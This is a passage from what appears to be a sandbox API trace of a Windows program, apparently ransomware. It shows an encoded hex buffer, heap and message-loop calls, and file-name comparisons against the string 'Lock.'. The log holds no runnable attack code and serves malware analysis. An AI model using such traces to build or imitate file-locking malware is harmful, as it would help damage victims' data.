\x96e3\x62e4\x1b44\x67e1\xdf52\x5c82\xb9f3\x5007\xaa8a\x81f2\x6ee6\xf5ae\x4f64\xc937\xc6ec\x9c93\x91cd\xbe92\x5ae5\x3d9a\x20ef\x7816\xd510\x97f9\x926\x3608\xa34a\x9175\x1a58\x3d89\xce24\xbb18\xbd20\xed5a\x2174\xed96\xeb62\x20fc\x2c83\xf4da\xfa2d\xa41d\xfcad\x3087\x8407\x808\x2762\x587f\xdd3a\xeb0b\x2c28\x79c2\x92eb\x92ab\xe416\xeb66\x2a69\xd8b4\x4984\xb3ab\x8bf8\xc86a\x6ff8\xa2a1\x4f92\x2d70\xcbca\x7aab\x9dc3\xb30d\x8ac1\x7771\xc43c\xe4d7\x2819\xb746\xb468\xcf86\x99a2\xea36\x621f\x8eb\xd67\xf9a5\x7bb1\x3484\xf38f\xd20a\x483c\x8bf1\xdd40\xcd2c\xa889\x779a\xf5d5\xd548\x4bc\x1af6\x73b4\xd9e7\xcf91\x2f9c\xcd72\x22f9\x8fef\x148f\xb751\x9461\x8fd8\xfda1\x9f85\x1f44\x8b10\x3ae\xc602\xc3a3\x335\x238\x9dc7\x3833\x8ac9\xd2e2\xb129\xc174\x361c\x3fb9\x7417\x204f\xa22d\x1f0b\xcd09\xa276\x9b7f\x75c4\x78cf\x31c3\x6faf\x5c68\x7539\x2213\x38e5\x6585\x942b\x57e6\x4e65\xdb2f\xa1bc\xec9\x99a4\xccab\x56d\x5ad6\x3241\x9457\xb1c\xc7a9\xee8c\x4b7e\xaa13\xa153\xbaf8\x5af2\x2a2f\xa8ee\x1b68\xfb27\xcaaa\x5ac4\x2824\x7a95\xd9b7\xde50\x8ad1\x71d4\x143e\xf68b\xd66a\x555a\x98d9\xc037\x6ca7\x9d9c\xf500\xfba5\x35ad\xcabe\xfac3\xb445\x4530\xecf3\x492d\xc4a2\xdd61\x79a1\x94f6\x55f4\x6b71\x26b9\xe7c3\x2e69\x24f9\xf7bb\x815\x76f1\xd477\x2e15\x1bfc\xc6ca\xec2d\xae1a\xe824\x4823\x11e6\x183c\x3103\x506b\x4219\x355f\xe79a\x65ae\x4fc3\x1ab4\xb2ed\x6b70\x65e8\xa747\x9bb5\x6e0a\x4a03\x75ca\x56e8\xcce\x38c8\x6d62\xaecc\xcf29\xabc5\x254\x9b29\x2d93\x9d08\xae9a\x593c\xcbd3\x131f\xc4a5\x2161\x864\xd934\x7b4c\x75e5\xf694\xb1d0\xa8b4\x8481\x38e6\xa860\x4a92\x7bfe\x5d56\x3fc2\xcf74\x647c\xcb9f\x8f5f\x5bb8\xad9a\x8961\x10a1\x9eb6\xcdcf\x271c\x41df\xe56c\x1b17\x134\xf78\x2f80\xaf9\x77a4\x3f91\x7a94\x5380\xf64c\x7ceb\xa45b\xbe62\xee7c\x1e1e\xa254\x4af3\x4606\x412a\x4df\x4434\x1545\x4b0b\x5f9c\xaa6f\x3e7f\xadea\xf534\x2c56\x1cca\xc9f5\xc26b\x2d77\x1735\xc1c3\xebd4\xc3c5\x1e23\xe6e3\xcb8b\x7019\xa21c\xb22c\xc4c7\x4596\xf90f\x8fb2\x2f79\xcfbe\x30bd\x4db\x6825\x766e\xdd17\x7c63\x5161\xb62a\x7e23\x617c\xefd1\xafc1\xfc02\x6d9a\x617c\xa7d5\x5f1b\xf4d8\x8d2b\x122f\x81f4\xee6\x2c7d\xe3bb\xd307\x188c\x875c\x371c\x70cd\xb01e\x4dbb\x70f3\x538c\x9ff\xe8f\x39ca\xd8cf\x4537\xdfd4\x11e1\xe5e\xdfe1\xf08b\x1833\xc45e\x29c6\x33c2\x950e\xa346\xecd1\xc458\x5e77\xbfd7\x39c8\xeda\xc8ad\xb89e\x925f\x6f72\xe9b5\x7017\x79af\x1260\xedb5\x6236\x46dd\x8d3c\xac25\xb057\x8ed4\x2cc9\xbf80\x7a1\x51d\x86f4\xbb0\xbb2a\x5458\x436\x5b1e\xf6f9\xf406\x4cd3\xebfb\x915f\x75f3\xdfb\xe653\x3d3e\x5d\xa829\x334\x6a49\x66e8\xfb2b\x7bef\xec40\xa695\xee\x3d2d\x3a15\x5eb6\xcb7d\x7d9\xe446\xf274\x6cd2\xf955\x7c3\x57a5\xf468\x686f\xc3a4\x9cc3\xc419\x13f8\x3be\x11d8\x4698\x6ed7\x4ac0\xeebc\xd85\xedfc\x8d1\x9720\x4ea6\x7da\x7e3c\x9a0f\xa86b\x46fd\xb778\x7a36\xacf6\x9cbc\xed14\x7ae0\x5ad5\x61de\x5e63\x43a3\xb732\x6705\xa240\x81d4\x2890\xfbc\xdb97\xff6f\xaa82\x261\x934\xa93d\xf97e\x69b5\x9962\xf4a9\xac69\x3682\xe6ab\xb0c1\x3f9d\x89a0\x23ca\x397\x61c6\x1533\x463\x69bc\xde41\xc854\x54a0\x47f6\x60b7\x5b68\xb790\xc3ad\x7dca\xe2ba\xef3c\xe2b2\x772c\x3e80\x45a9\x1b11\x319d\xb83e\x750c\x1e2\x609b\x4dc6\xaf76\xed0d\xa5f2\xc4cb\x42d6\xf0b6\x8e7e\x73e1\x9abd\xa12e\x4cab\x1ae5\x8c44\xbc5c\x3fb\x31cf\xf5d3\x7c35\xf70b\xa002\x6a97\x36fe\x41c5\x693c\x1bf\x52c5\x481f\xd0cb\x5412\xff69\x3406\x8093\xcd83\x9123\x6163\xdbf6\x4250\xcdca\xa077\x73ff\x93be\xf156\xa964\x313b\x1f59\x8a36\xc59f\x8dc5\x29ba\x5a4e\xa08e\x2d57\x8181\xa346\xc825\xf503\xe9f9\x3872\x7151\xbe5a\x5651\xa4cb\xae97\x2793\xa936\xd95d\x197b\x4432\x9463\x1eff\xc719\x4ce8\x7fa0\xfd83\x7bfa\xc744\xb4cc\x30ed\xe1ee\xe334\xff4\x181\xf60d\xb191\x3fe8\x3442\xb6d\x320f\x7f4e\xe81f\xe68f\x571e\xdd83\x811e\xd9d2\x32b6\xd1d0\x3d25\x1d05\xb227\x978c\x25b0\xf03f\xf3ca\xd4e6\xd8fd\xf1d\x5ba1\x9d3\xfe3d\xccb6\xbf71\x4bd9\x85df\xb586\xe78c\x1b63\x955a\x8242\x6d13\xb824\x5d6\x6dbc\xee13\x28a2\x6b1b\x7c16\x57f3\xa7e4\xc237\x64e8\x599e\x1b67\x55e\x647a\x5a1d\xbe43\xa121\x6c7\x3143\xb19b\xeb35\xb96c\xccfc\x3115\x77\xbce0\x9026\xf19d\x56be\xd7a1\x65dc\xf6c2\x2657\x7f6c\x39a5\xdb51\x315f\xb4f7\x493f\x36fd\xdeae\x699b\xfe1b\x492c\x245b\x9aee\x54ac\x158c\xd59b\x5da8\xc957\xf6b8\x7ad7\x4aea\x5bbe\x75e7\xaacf\xbaf7\x5d8b\x6598\x7856\x1784\x9ef\xde51\xc6c\x7aa7\x4b9a\xd2fb\x7ada\x4a6f\xcbb1\x4904\x71af\x97c9\xd8c4\x5966\xa967\x9a8\x4fbc\xd927\x4db8\xf711\x8be4\x96c5\x657c\x85b1\xdfdb\xbe22\xc2f9\x36b8\xe348\xc7c6\x93c\x1032\xcfa\xe8e\x2adf\xf90f\xb98a\xcc0a\xcbb7\x45b1\x5a5e\xdd97\x2fc4\xd9a2\xffef\x2c91\xc595\x7250\x5cef\x356a\x5dee\x3245\xe73e\x4e47\x2be6\x42d6\x62a1\x757e\x2c03\x4f1b\xa361\xe848\xc1e6\x665a\x974b\xd645\xca93\x38fa\x75d5\xc75e\xe1e7\x2ed4\x458b\x9677\x71f5\xb041\xe7cf\xe555\x4a38\xc4e1\x72fa\x13b1\x3dc7\x2cb1\x6cc4\x340e\x6f85\xf904\x4a02\x86f0\xbc26\x86a0\x5cf2\xf746\xa5e0\x280e\x3426\x15c1\x514e\xd431\x4a17\x4d09\x3f68\xcab\xad10\x8460\x95f7\x1034\x2a1a\x988e\x9d3c\x428d\x2a48\x998b\xcf3c\x43f2\x98e3\xfec6\x87dc\x6ecb\xb534\x340a\x4aed\x4f4e\x59c8\x91ab\x2538\x3edc\x167e\x3389\xdf7c\x54a6\xbb2e\xe51f\xa886\x417\xe2c1\x78f8\x3586\xd200\x13e9\x8fb8\xa75c\x1c99\x818\xc962\xe393\xc990\x2ca2\x69e7\xedd4\x92ac\x5f71\xdfc7\x7623\x1f06\x79e1\x7da9\xf3d\xdd79\x9d59\x70a6\x1187\xfc35\x98ee\x57f0\x8475\xb8a6\xf3d8\xe2ad\x217e\xc700\xb7f6\x7b63\x3d44\xf277\x5644\x93af\xd1aa\xb262\x7e36\xb37c\xa593\x6673\xfbf6\xbe6a\xc257\x7e06\x9a6f\xda5e\xc9e9\x29b7\x8715\x7f71\x320\xce65\xb947\xb241\xdb2d\xf2e4\x237f\xb6a7\xa2b5\xcd7d\x5ba1\x306c\x2b0d\x6dd0\x5d05\xd056\x573\x565d\x75d0\x5d05\xd056\x575\x565d\x75d0\x5d05\xd056\x575\x565d\x75d0\x9d45\xb7eb\x4236\x3154\x7544\x59e2\x2049\x8db7\xbbd\x3422\xcf0f\xb93f\x1e82\x7810\x1054\xefe3\x1195\xbba3\xe051\xe34e\x78ed\x5aac\x96ac\x23c4\x9d4b\x9f66\xbf40\x9448\xb3df\x861b\xcc74\x78e7\x1135\x5def\x69a7\x5aed\xf38b\x5166\xed2a\x6e32\xbc96\x45e5\xa52d\xad12\xef61\xa0e0\xf142\xbeb3\x8980\xf9a3\xd036\xef77\x2590\xef9a\xda08\xdca7\x9381\x2064\x83d2\x3228\xa315\x820f\x505e\x8af5\xe269\x637a\xb29c\x4caf\xd583\xd948\x9de8\xb292\xd40\x9056\x200d\x987e\xc2db\xd09f\x883\x3f2f\xdc85\xe569\x9005\x9d64\x7077\x84fa\xaaa\xef39\x9e49\x63e0\x4ef4\x372f\x3311\xe57\x4524\xeb2d\x62a\x723\x14c2\x4f85\x8a41\xf086\xb047\xaf02\x2f1f\xb04b\x77be\xb52a\xd9b2\xbd88\x5d4b\x3105\x77a2\x3e33\xdec3\xbb0d\x3c7f\xdd76\xcd0a\x247f\xe20c\xa644\x6dd1\x2e06\x2181\x7b19\x263d\x48fc\x3ee7\x191a\x9690\xfa7d\x546d\x8f2\xb3db\xa261\x554d\x5cb8\x1dc4\xc202\xd873\xc5b3\x569a\x9117\xee7f\xbb73\xfce2\x2130\xfdad\xd9d7\xfe11\xddc6\xdfdd\x4767\xa24e\x8882\x12d3\xc548\x6eca\x653e\x1d9a\xb5e\xcc4e\x23a8\x3130\x4bf4\xab75\xe4d8\x9edb\xa39b\xa054\x9b2b\xfd6a\xc40a\x2cdf\x7e3\xc97b\xd0d1\xe923\x5816\x3d7b\xca0d\x9c5a\x6554\x8b63\x5699\x8afc\x9160\x5936\x4658\x685d\x2d15\x448d\x38a\x53da\x71d2\x4eb\x9787\x7fbd\xf01d\xe5a1\xedc0\x85ff\xe4f3\x85cd\x5591\xfed6\x6229\xbd54\x2f24\x7747\xa25f\xe6e7\x94e5\x7ac8\xf2b6\xc3e6\x7032\x8b54\xd3d7\x74b0\xee18\x900e\x7e50\x13a\x3db9\x5bb3\xa50d\x58dc\xb0e6\xadf9\xfe0d\x96cc\x77c0\x6fc8\x72f2\x4c6\x6980\xfe5\x74d9\xdd06\x1c5e\x288e\x4e90\x95b1\xbc77\x2b02\x4829\x1d76\xdd36\x7465\x82a4\xddde\xdba4\xad09\x8f0f\x3180\xdd5a\xa304\x183c\xc1ef\x17c2\x64c0\x1dfb\x92f8\x2f08\x135a\x12e2\x2947\x706f\x23b9\xd6c\x3a96\x6848\x8a79\xb1b2\x2f9e\xb054\x754a\x7560\x63b9\xb8bf\x964d\xca94\xa33f\x383f\x78c8\x9edf\xeddd\xaf4f\xac05\xb77d\xf800\x53ae\x5d0b\x7288\xbde4\xe730\xe36f\x8015\xdafe\x6d4f\xd605\x3f66\xa3dd\x5ce6\xe7ad\xbef1\x8f5f\xc6fd\xc4c5\xa9eb\xea59\x85f6\x650a\xa055\xe967\x7520\x825d\xdacf\x3aa0\x43bc\x31d2\xcf81\x107a\x2cd2\x8f69\x410e\xdf8d\x75a8\x5814\xf84f\xbf33\xbc0a\x306\xcd8d\xff2e\x778a\xb47f\x95f1\x1f4d\x7c6a\xaa95\x9aa7\x12d\xf9e8\xdc58\xc29e\x8f9e\x1bd5\xcf45\x16c7\x8a35\x8f9e\xd69d\xab88\xe1c0\x3cc8\x5f41\xa652\xc684\xdc8d\x562c\xaf67\x8dd2\x9b07\x7e43\x3f8b\x60f3\x2be0\xa444\xbba7\x6771\x9c57\x2e1\x5d66\xdb4\xb599\x39d8\xcf85\x1222\x35dd\xce15\xe7b6\xab8\x21d\xbb3d\xe97d\x8e0a\xa07b\x1068\x77c5\x812\xf5e8\xf95b\xa709\x8b80\xfead\x34d2\x56c5\x745\x71be\xcab3\x4d57\xecc8\xab52\x9120\x1b46\xdb70\xfed3\x4c72\xbed4\xd73c\x1ee\x800e\x4fae\xeccd\x6fc1\xd4f0\x9e81\xfe1a\x5b2b\x1c77\xb09\x2c37\xead8\x2bd8\x4262\x367f\x5205\x5fb1\x22c6\xbaa3\xbc59\xd22f\xeff9\xfaaf\x941a\x59e1\x3c56\xd529\x3514\x54bd\x12f5\x73f2\x4173\x9e7\xe1ad\x21f2\xf8c8\xd928\x8d1f\x4186\xb7ac\xdc01\xa7ea\xf1e8\x54aa\xc4dc\x166d\xa3aa\x8b00\xd151\x6248\xdb74\xa903\xd05a\x80ef\xf415\x8efb\x112c\xb25\x6265\xaf04\xafe7\xf2af\xebe5\x5c5f\x7e0e\x6c8\xf082\xb8d7\x96ab\x6bc5\x8437\xbde0\xa9cd\x3505\x374b\x3f29\xd585\xf8ae\x3cbc\x31f7\xaa49\x5ba1\x5050\x280e\x60d\xd3e\x9a14\x825f\xf2af\xf5dc\x8c00\x9746\xf463\x1e3a\x38fd\xa746\x6888\x32dc\x2f0e\xcf29\x75fd\x5c5c\xc625\x53dd\x1b9e\x8b8a\x3143\x7c39\x7953\xafee\xe2e2\x62d6\xf5dc\xb9e5\xc44f\x61c5\xe10d\xca4b\xff73\xe96d\xb89\x5c61\xf2ff\x37dc\x2e30\xc449\x863d\xc02b\x37af\x4f44\xa8dc\x6b66\xf790\x9c22\x8384\x204\xc41c\x2090\x931f\xb68e\x233\xcf2d\x1923\xa356\x8403\x31a7\x4890\x3b1b\x3cdc\xe819\x3804\xa303\x2165\xf40b\x26e0\xe7f5\xf6a0\x676b\xb68f\xca23\x214d\xb422\x844a\x8b66\xb150\x2d08\xa114\x447b\x58a8\x6684\xd088\x1132\xc89a\xb443\xa22c\xdb54\x58d9\xf111\xb8a2\xe2cd\x77ba\x5a39\xfc40\x8830\x9adf\x162a\xf9fc\x729f\x8549\x490a\x4505\xc811\x217a\xa42e\x2083\x37cf\x71d9\x4a02\xfb02\x11cf\x1d5c\x985b\xbfeb\x2c40\xd91c\x112f\xb7d9\x9c70\x3d03\x132b\x128d\x1eb9\x69ac\x177c\x7e30\x87d\xf294\x783\x80f\xeb76\x8d7d\x411b\xc0fd\xab14\x2573\xbd69\x6128\x973f\x9a2d\xd559\xa111\x4554\x2289\x17a6\xd4d1\xaea7\x2585\xa4f0\x8fa9\x8140\x2fa7\xf7b\xa76a\x65a9\xcad7\xe0fc\x5ed6\xc9f6\x457f\x4f09\xf0b\xd8b4\xcbe\x2c1b\xcf45\xe0e1\xaabe\x593\xa21a\x30d7\x9a42\x1b1e\x9987\xc1f6\x30f3\xa916\x4257\xb489\x2d9b\xc5e5\x5cf1\x6093\xe075\x7aa7\xd258\x68e1\x3ea4\xa686\x78da\xaddd\xa16c\x39a8\x9c72\x4ae7\xe4ae\x3cd4\x648f\xc531\x661\xe1ad\xf644\x8fcf\x300\xe30e\x95d2\x3bf1\xace9\x957b\x9e76\x5feb\xb219\x5e3f\xfdc7\x7175\x8cce\x9dbb\x8352\x217a\xd877\x8ae3\x7719\xc3d8\xe0b\x417\xe7cb\xc371\xf968\x392f\xb517\x194f\x4283\x3962\x449f\x25e3\x6d14\x2125\xae26\x98fd\x8fcf\x421\x48a0\xdde4\x469f\xefa7\x1c17\x8c1c\x5f4e\xd800\xfd9a\xebc6\x2cb1\x4783\x8a51\xe60f\x2ebd\x5d36\x3ea3\xd315\xd674\x4ed9\x5df6\x703d\x57b9\xe13e\xf10c\x124e\xed4a\x1a03\xfb2f\x1216\xed07\x5def\xf323\x193\xf893\xa50\xc85f\x87cd\xe362\x4599\xdf53\x46b8\x678c\x7ffa\xfe78\xc48b\x7bb5\xe11f\x32dd\xc569\xc5cf\x53c6\x7598\x5912\xa89f\x2cf6\x33fc\x668f\xd4d0\x6b92\x8a04\xb0a4\xa1e7\x234e\x6ef5\x7308\xb62f\x468e\x224\x6348\x4da6\x9e7c\x412b\x9178\xfda6\xd32f\x5d61\xaa7d\xd696\xfb0a\x31a3\x59ea\x9088\xf97a\x4556\xe6e5\xaeb9\xe588\xfca7\xd0a8\xe7c4\xc9b9\x64a6\xc4ec\x2868\xfd7a\xd9d6\x4848\xbd07\x7a1\xf11a\xde7c\x6dc7\xb1d8\xae46\xf90f\xffb2\x5883\x9834\xd284\xf892\xee68\xff64\x1cbc\x7246\xb23d\x17d8\x3c84\x3579\xebd4\x5e0d\xd171\x602f\xec04\xb252\xdce0\xbb9\x2560\x9296\xd188\xf4c7\xef06\x294e\x3bbb\x6ca7\x9a9d\x5ee3\xa55d\xe6\x3724\x929\xb62\x55bd\x6b77\xfd78\x6e10\xc2c9\xb1b4\xb269\x7e14\x550b\x5049\xad32\x6830\xbc0b\xafb9\x9fb8\xb6e0\x9f7\x9d9c\xb857\x159f\x8917\x152a\x7357\x7b1b\xdb1\xe1ef\x21ca\x5945\x6b7e\xae17\x793c\x56ea\x7abc\x9bd7\xe39b\xb455\x2d9c\xeedc\x5303\xcded\xbf1d\x816a\xad2c\x252c\x6b68\xc5df\x387e\xd3d8\x6e47\xf561\xf1d2\x4077\xf082\x5234\xfb4\xe344\xa03b\xfe29\xada0\x2bd5\x315f\x171\xee1a\xad6d\x7d3d\xecbb\xbedc\xbf9d\xe14f\xb306\x5c2e\xd2a6\xbdef\x8b78\x16a0\x22ba\x8a01\x3d55\xcae6\x84a5\x25f6\xd521\x6042\x5ab9\x5532\x4aed\xf590\xf029\x8ed\x9924\xbf69\x2dfc\x90b7\x407a\xc69c\x5b43\xddb5\xe376\xe1e3\xd164\xd9a1\xeb7e\xefed\x914a\x9ae3\x2409\x568\xa779\x1f2a\xae84\xce29\x2398\x9bc1\xc40\x7e66\xd98a\x7280\xdfb9\x17ac\x6383\x73d4\x2289\x5c2f\x6d11\x5f8a\x7adc\x9864\x2556\xf784\x9207\x13a2\xd164\xb347\x7589\xbcd8\x72a9\xeb4\x82b\xa2b7\x4e85\x9de5\x877c\x99b2\x4225\xfc7d\x5c10\xbe7d\x3ca3\x8934\x549f\x6a33\xabbf\x82ee\x2ab2\xc54d\x68db\xdda6\x1bfe\xa971\xa00\xc6a5\x7949\x44c9\xb87e\xe9ff\xf0df\xe53e\x416a\x5d90\x8c6b\x4b6e\xfa0\x6916\xe634\x5385\x6e8c\x206b\x8449\x671c\xe7f7\x76b3\x9fde\xc5f0\xd491\xd700\x8f50\x3fb2\x4335\xd058\x6ef1\x4e8a\x706f\x85d9\xcba2\x971d\x7a41\xd981\x1e37\x85c1\xd50b\x1ae2\xb52e\x1cf\xb895\x334\xe354\x2ac\x945a\x7313\x3b55\x2f8f\x905\xbf8d\x50b3\xde96\xe3c9\x3f08\xd51c\xebdd\xc848\xd9c0\xf0f\x9633\x48a7\x127a\xd236\xeb4c\x67c\x2413\xa312\x766e\x3914\x4ada\xe140\xd851\xe42a\xc60d\x12a5\xcb3f\xee6c\x540e\x239f\xc530\x65d9\xa351\xc635\x988f\x668f\x3b36\xe47b\x9e28\x1db0\xc1ff\xe8d4\x11de\x4e8a\xeb07\xbbed\x7501\x3780\x78cf\x9f96\x3fc5\xb680\xe0cd\xf7f8\xf8f2\x1045\xbdba\x23cc\xac05\x1e84\xdf41\x822b\x8c46\xb13c\x2183\xb22e\xb174\x3e72\xb8c9\x6fc2\xc532\x70df\x39e2\x7a5e\x292b\xd0d2\xf32b\x59a4\x137a\xd09\x4e38\x7b3c\x7c4a\x9620\x3bb1\x440e\x595d\xb1f4\xc85a\xd9d6\xae53\xbab8\x9450\xc99a\x2cbd\x4fd1\xfc7b\xd0e5\x3c12\xea96\xc3ca\xe653\x2b61\xe07a\x31e2\x121f\xc5d5\xaaee\xe9fb\x6473\xa2fc\x2b0\x1b3c\xadd7\x971a\xe248\x4f2a\x7235\xa84a\xaf72\xa89e\x2d05\x187e\xecce\x6563\x119e\x7e81\x35d9\xc795\xdef2\x811c\x3017\x7598\x8594\x53af\x4cd\xbd5c\xd713\xab59\x8912\xa0d9\x99bc\x808d\xecdd\xdf4\xf51c\x9ffa\x705\xf720\xae7b\x163c\x7bf8\xd95e\x9719\x9e\x7ddf\x7f02\x34c0\xea7d\x9927\xd852\xcc4a\xece6\x182e\xa558\x7d02\xcb4e\x2e3c\xe61c\x13e\x643b\x1f0d\xf1e7\xc2f5\xac76\xfa27\x3783\xdb62\xd354\x8ee6\xaa18\x98c2\xaccc\xf32d\xaedc\x6177\xc783\xec56\xc08\xecab\xa902\x943b\x972f\x8ce5\x6280\x5b68\x1938\xa927\xbb2\x417a\xf73b\x8474\x669d\xd613\x509f\x789f\x343b\x5a11\x120c\xd1fe\xd675\x1a8a\xab5d\xaec\xc638\x74b9\xb8ef\x7a3e\x8c1e\x35c6\x3bca\xcc8d\x8375\x5890\xa086\xbf04\xcd0e\xbc80\x906b\xd22f\x70c9\x4012\x2012\xa21e\xffb0\x5d66\x1dc7\xb77c\xd785\x8921\x1db4\x2183\x7b0a\xf361\xc603\x1762\xe67e\xdb88\x64f9\x407d\xbbe0\x11ef\x5c08\x81df\x33a8\xf4ac\x1906\x741d\xdc40\x10b9\x8ad7\xc37f\x8ca8\xaf1b\x605b\x61e4\x5c5d\x2efc\x31a4\x88eb\xdb5\x177b\x2cf8\x4934\xd7e6\x909e\x46a2\xcf76\x815e\x417a\x1b3b\x882f\x2b7c\xe714\xe286\xcc60\x42f5\x7ecc\x6415\xf32f\xf8c\xcb15\x95fa\xe8a4\xa8cb\x2e3f\x14bb\x6b3\x5df9\x7702\xd3f0\x713\xf0\x3f45\x567e\x303c\x138f\x5163\x543d\xd48a\x11b2\x6d0a\x2f19\xaaae\x4168\x376c\x6d46\xcf1d\xa27d\x952e\xec1a\xdd4f\xb31d\x9f70\xd5c7\x770f\xa661\x6240\xb4f6\x78c8\x6603\x48ec\x5ee3\x677d\xfab9\xd85d\xf516\xbd4b\xeddd\x1c8a\xc569\xa59b\x8c07\xfdc4\xf9a0\x12e9\x32d9\xe5e6\x5723\x6fc\x5f0f\xea79\xf02\x5090\xba41\xb699\x49f6\x90ec\x1d2f\xa58f\x699a\xa059\xd047\x721a\xbe35\x7bcf\xef92\xbb01\x61a2\xc20d\xe7d4\xb522\xc0ed\xab7\x249c\xde1b\x7db3\xacf0\x528d\xa43a\x91f\xec81\x5a9e\xe288\x85ad\x7de1\x847c\xe3b8\xa082\x6a3b\xbed0\x846e\xcf0\xa3b8\xc7ee\xc3fc\xccf3\xefb4\xcd7e\xbeef\xac16\x7a21\x4195\xac1b\x59d3\x5578\x9d50\xde05\x3b2\xb15d\xa3b7\x162\x6cca\xb8d3\xe78f\xd39e\x851a\xf161\xa686\xd9c8\x5e4d\xd57e\xd881\x9df6\x4f8\x3dce\x37e3\xc281\x1e3c\xc6e1\xd440\x7556\x9795\xb3c0\x3663\xceae\x3766\xcdf1\xe117\x9d44\x4fc\xdd9f\xf464\x4c0f\x8fdc\xf7\x7176\xb3ef\xbfe9\xda16\x326b\xf90f\x1d7e\xcb9d\xb8c2\x8913\x6978\xbf1f\xe075\xee4e\xbc2f\xab0\x17af\x4104\x3cab\xbb97\xcf80\x1e30\xb74a\x6e05\xaaa2\xaeb\xb3c\xcb06\x52d6\x5095\x6f15\xd071\xe441\xb428\x2101\xc60e\x614b\xd4e8\xbc1c\x86fc\x33fa\xbdcc\xc3eb\xd8c3\x5461\xba29\x2724\xc91e\x6153\x7525\xe960\x8409\x66ca\x33a1\x9b2\x73d8\xeeee\x66a2\xf864\xcf76\xf3a6\x87dd\x6a37\x3893\x34cb\x120a\xbef5\x2663\x5379\x39dc\x4a4\xc700\x21ce\x37f9\xef9d\x521c\x4e6c\xfe3\x1724\xf46a\xf72d\x7c8b\xec7d\xe8d0\x5d7\x1db4\x3faf\x4505\x20a3\xa676\xbb34\x8f0e\x3fb2\xdeea\xa7c0\xdfa\xabf7\x66e2\x2a0\x51e8\x7e5f\xb3e8\x2915\x21e8\x5ea0\x8596\x49ca\x4dd1\x1a29\xac7a\xaed7\xd47b\x86dd\x91fc\xaf6e\xcbe2\xa3c6\xa16e\x81a0\x49ae")) returned 0 [0255.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3190 | out: hHeap=0x25c0000) returned 1 [0255.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0255.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0255.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0255.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0255.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0255.889] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 1 [0255.889] TranslateMessage (lpMsg=0x8bf970) returned 0 [0255.889] DispatchMessageW (lpMsg=0x8bf970) returned 0x0 [0255.889] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0255.889] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0255.890] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0255.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0255.890] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0255.890] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0255.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0255.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0255.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0255.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0255.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0255.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0255.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0255.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0255.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0255.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0255.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0255.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0255.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0255.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JP0X848xky.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0255.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="P0X848xky.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0255.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0X848xky.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0255.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X848xky.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0255.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="848xky.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0255.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="48xky.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0255.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8xky.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0255.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xky.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0255.891] CompareStringW (Locale=0x400, 